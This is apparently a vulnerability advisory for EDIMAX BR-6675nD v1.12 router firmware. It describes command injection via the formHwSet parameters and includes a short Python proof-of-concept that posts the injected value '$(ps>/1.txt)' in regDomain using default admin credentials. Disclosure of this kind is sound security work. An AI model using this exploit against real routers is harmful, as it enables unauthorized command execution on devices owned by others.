BR-6675nD v1.12
The EDIMAX BR-6675nD v1.12 firmware has a command injection vulnerability in the formHwSet function. The function receives the regDomain, ABandregDomain, nic0Addr, nic1Addr, wlanAddr, and inicAddr parameter from a POST request. However, since the user can control the input of these parameters, the statement system() can cause a command injection.

import requests
ip = "192.168.153.2"
payload = "$(ps>/1.txt)"
data = {"regDomain": payload}
url = f'http://{ip}/goform/formHwSet'
res = requests.post(url=url, data=data, auth=("admin", "1234"), verify=False)
print(res)
